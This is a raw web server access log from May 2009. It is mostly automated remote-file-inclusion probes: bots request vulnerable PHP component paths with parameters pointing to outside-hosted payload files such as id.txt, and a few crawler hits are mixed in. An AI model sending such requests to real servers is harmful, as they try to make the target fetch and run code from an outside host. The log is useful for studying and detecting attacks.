202.75.4.169 - - [14/May/2009:08:28:06 -0500] "GET /errors.php?error=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
207.57.79.26 - - [14/May/2009:08:28:23 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:08:28:23 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
65.55.106.110 - - [14/May/2009:08:28:38 -0500] "GET /logs/access_log.1152921600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.57.79.26 - - [14/May/2009:08:28:43 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:08:28:43 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:08:29:07 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:08:29:07 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
145.253.245.211 - - [14/May/2009:08:29:08 -0500] "GET /logs/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
145.253.245.211 - - [14/May/2009:08:29:09 -0500] "GET /errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
217.160.4.250 - - [14/May/2009:08:29:56 -0500] "GET /errors.php?errors=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
217.160.4.250 - - [14/May/2009:08:29:56 -0500] "GET /logs/errors.php?errors=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
217.160.4.250 - - [14/May/2009:08:29:56 -0500] "GET /logs/access_log.1233187200/errors.php?errors=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
217.160.4.250 - - [14/May/2009:08:30:01 -0500] "GET /logs/access_log.1231545600/errors.php?errors=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
207.57.79.26 - - [14/May/2009:08:30:16 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:08:30:16 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
208.64.202.134 - - [14/May/2009:08:30:40 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
208.64.202.134 - - [14/May/2009:08:30:40 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
208.64.202.134 - - [14/May/2009:08:30:40 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
208.64.202.134 - - [14/May/2009:08:30:40 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
207.57.79.26 - - [14/May/2009:08:30:50 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:08:30:50 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
208.64.202.134 - - [14/May/2009:08:31:12 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
208.64.202.134 - - [14/May/2009:08:31:12 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
208.64.202.134 - - [14/May/2009:08:31:13 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
208.64.202.134 - - [14/May/2009:08:31:13 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
69.237.82.158 - - [14/May/2009:08:31:46 -0500] "GET /logs///tools/send_reminders.php?noSet=0&includedir=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.814"
69.237.82.158 - - [14/May/2009:08:31:47 -0500] "GET ///tools/send_reminders.php?noSet=0&includedir=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.814"
124.0.55.34 - - [14/May/2009:08:32:38 -0500] "GET //include/lib.inc.php?site_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
124.0.55.34 - - [14/May/2009:08:32:38 -0500] "GET /logs/access_log.1236297600//include/lib.inc.php?site_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
124.0.55.34 - - [14/May/2009:08:32:38 -0500] "GET /logs//include/lib.inc.php?site_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
124.0.55.34 - - [14/May/2009:08:32:38 -0500] "GET /logs/access_log.1234828800//include/lib.inc.php?site_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
219.94.148.39 - - [14/May/2009:08:32:50 -0500] "GET //modules/xfsection/modify.php?dir_module=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
219.94.148.39 - - [14/May/2009:08:32:50 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
219.94.148.39 - - [14/May/2009:08:32:50 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.148.39 - - [14/May/2009:08:33:19 -0500] "GET /logs/access_log.1233792000//modules/xfsection/modify.php?dir_module=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:08:35:06 -0500] "GET /logs/access_log.1157846400 HTTP/1.1" 200 657 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
201.234.41.5 - - [14/May/2009:08:35:06 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 200 189322 "-""libwww-perl/5.79"
201.234.41.5 - - [14/May/2009:08:35:07 -0500] "GET //?path%5Bdocroot%5D=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
190.144.44.36 - - [14/May/2009:08:35:23 -0500] "GET /components/com_rsgallery/errors.php?error=http://www.freewebtown.com/fatal2009/images/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
190.144.44.36 - - [14/May/2009:08:35:23 -0500] "GET /logs/access_log.1239926400/components/com_rsgallery/errors.php?error=http://www.freewebtown.com/fatal2009/images/fx29id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
190.144.44.36 - - [14/May/2009:08:35:23 -0500] "GET /logs/components/com_rsgallery/errors.php?error=http://www.freewebtown.com/fatal2009/images/fx29id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
65.55.106.240 - - [14/May/2009:08:36:29 -0500] "GET /logs/access_log.1147305600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
122.153.212.195 - - [14/May/2009:08:37:05 -0500] "GET /logs/access_log.1239494400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
207.57.79.26 - - [14/May/2009:08:37:30 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:08:37:30 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
62.44.79.35 - - [14/May/2009:08:38:27 -0500] "GET /agenda2.php3?rootagenda=http://www.depo.org.pk/images/21/ts?? HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
66.249.67.180 - - [14/May/2009:08:40:14 -0500] "GET /logs/access_log.1182643200 HTTP/1.1" 200 329 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.90.91.245 - - [14/May/2009:08:41:44 -0500] "GET /logs/errors.php?error=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.822"
209.90.91.245 - - [14/May/2009:08:41:44 -0500] "GET /errors.php?error=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.822"
66.219.97.207 - - [14/May/2009:08:42:03 -0500] "GET /logs/errors.php?error=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
66.219.97.207 - - [14/May/2009:08:42:03 -0500] "GET /errors.php?error=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
64.118.90.253 - - [14/May/2009:08:42:19 -0500] "GET /logs/errors.php?error=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.823"
64.118.90.253 - - [14/May/2009:08:42:19 -0500] "GET /errors.php?error=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.823"
122.153.212.195 - - [14/May/2009:08:45:04 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:08:45:07 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:08:45:09 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:08:45:20 -0500] "GET /logs/access_log.1239580800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
207.57.79.26 - - [14/May/2009:08:46:37 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:08:46:38 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.825"
65.55.106.156 - - [14/May/2009:08:47:29 -0500] "GET /logs/access_log.1206316800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
217.160.4.250 - - [14/May/2009:08:47:35 -0500] "GET /logs/access_log.1231718400/errors.php?errors=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
217.160.4.250 - - [14/May/2009:08:47:36 -0500] "GET /logs/access_log.1234224000/errors.php?errors=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:08:49:08 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:08:49:08 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:08:49:08 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:08:49:20 -0500] "GET /logs/access_log.1239580800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:08:49:37 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:08:49:37 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:08:49:37 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:08:49:58 -0500] "GET /logs/access_log.1240531200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:08:51:27 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:08:51:27 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:08:51:27 -0500] "GET /logs/access_log.1233187200/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:08:51:27 -0500] "GET /logs/access_log.1231372800/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:08:51:27 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:08:51:27 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:08:51:27 -0500] "GET /logs/access_log.1231372800/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:08:51:27 -0500] "GET /logs/access_log.1233187200/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
219.85.63.226 - - [14/May/2009:08:51:32 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
219.85.63.226 - - [14/May/2009:08:51:32 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
219.85.63.226 - - [14/May/2009:08:51:32 -0500] "GET /logs/access_log.1237161600/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
219.85.63.226 - - [14/May/2009:08:51:33 -0500] "GET /logs/access_log.1233705600/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
219.85.63.226 - - [14/May/2009:08:51:34 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
219.85.63.226 - - [14/May/2009:08:51:34 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
219.85.63.226 - - [14/May/2009:08:51:34 -0500] "GET /logs/access_log.1237161600/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
219.85.63.226 - - [14/May/2009:08:51:40 -0500] "GET /logs/access_log.1233705600/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:08:52:15 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:08:52:15 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:08:52:15 -0500] "GET /logs/access_log.1230768000/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:08:52:15 -0500] "GET /logs/access_log.1237161600/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:08:52:19 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:08:52:19 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:08:52:19 -0500] "GET /logs/access_log.1237161600/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:08:52:19 -0500] "GET /logs/access_log.1230768000/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
85.214.86.93 - - [14/May/2009:08:55:08 -0500] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
85.214.86.93 - - [14/May/2009:08:55:08 -0500] "GET /logs/access_log.1239926400/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 380 "-""Mozilla/5.0"
85.214.86.93 - - [14/May/2009:08:55:08 -0500] "GET /logs/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 358 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:08:55:32 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:08:55:37 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:08:55:37 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:08:56:27 -0500] "GET /logs/access_log.1240531200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
66.219.97.207 - - [14/May/2009:08:56:34 -0500] "GET /logs/errors.php?error=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
66.219.97.207 - - [14/May/2009:08:56:35 -0500] "GET /errors.php?error=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
65.55.106.143 - - [14/May/2009:08:56:59 -0500] "GET /logs/access_log.1167696000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.165.73.157 - - [14/May/2009:08:58:13 -0500] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.gdiscount.fr///modules/ab.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
121.165.73.157 - - [14/May/2009:08:58:13 -0500] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.gdiscount.fr///modules/ab.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
121.165.73.157 - - [14/May/2009:08:58:13 -0500] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.gdiscount.fr///modules/ab.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
121.165.73.157 - - [14/May/2009:08:58:13 -0500] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.gdiscount.fr///modules/ab.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
217.147.29.190 - - [14/May/2009:08:58:50 -0500] "GET /logs//?_zb_path=http://www.maskany.com/idomila.txt?? HTTP/1.1" 200 189322 "-""libwww-perl/5.808"
217.147.29.190 - - [14/May/2009:08:58:50 -0500] "GET //?_zb_path=http://www.maskany.com/idomila.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.808"
64.118.90.253 - - [14/May/2009:08:59:01 -0500] "GET /logs/errors.php?error=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.823"
64.118.90.253 - - [14/May/2009:08:59:01 -0500] "GET /errors.php?error=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.823"
217.147.29.190 - - [14/May/2009:08:59:17 -0500] "GET /logs//?_zb_path=http://www.maskany.com/idomila.txt?? HTTP/1.1" 200 189322 "-""libwww-perl/5.808"
217.147.29.190 - - [14/May/2009:08:59:17 -0500] "GET //?_zb_path=http://www.maskany.com/idomila.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.808"
209.90.91.245 - - [14/May/2009:08:59:20 -0500] "GET /logs/errors.php?error=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.822"
209.90.91.245 - - [14/May/2009:08:59:20 -0500] "GET /errors.php?error=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.822"
218.38.243.71 - - [14/May/2009:09:03:31 -0500] "GET /logs/access_log.1239062400//include/print_category.php?setup[use_category]=1&dir=http://www.beplanten.nl/administrator/components/com_virtuemart/1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
218.38.243.71 - - [14/May/2009:09:03:31 -0500] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.beplanten.nl/administrator/components/com_virtuemart/1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.38.243.71 - - [14/May/2009:09:03:31 -0500] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.beplanten.nl/administrator/components/com_virtuemart/1.txt???? HTTP/1.1" 404 315 "-""Mozilla/5.0"
84.201.208.50 - - [14/May/2009:09:04:13 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
84.201.208.50 - - [14/May/2009:09:04:13 -0500] "GET /logs/access_log.1228867200//include/admin.lib.inc.php?site_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
84.201.208.50 - - [14/May/2009:09:04:13 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:09:04:37 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:09:04:37 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:09:04:37 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:09:04:37 -0500] "GET /logs/access_log.1239235200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:09:05:01 -0500] "GET /logs/access_log.1239321600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
213.251.169.83 - - [14/May/2009:09:06:18 -0500] "GET /logs///tools/send_reminders.php?noSet=0&includedir=http://www.melhoreseremdois.com//plugins/Help01.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
213.251.169.83 - - [14/May/2009:09:06:18 -0500] "GET ///tools/send_reminders.php?noSet=0&includedir=http://www.melhoreseremdois.com//plugins/Help01.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
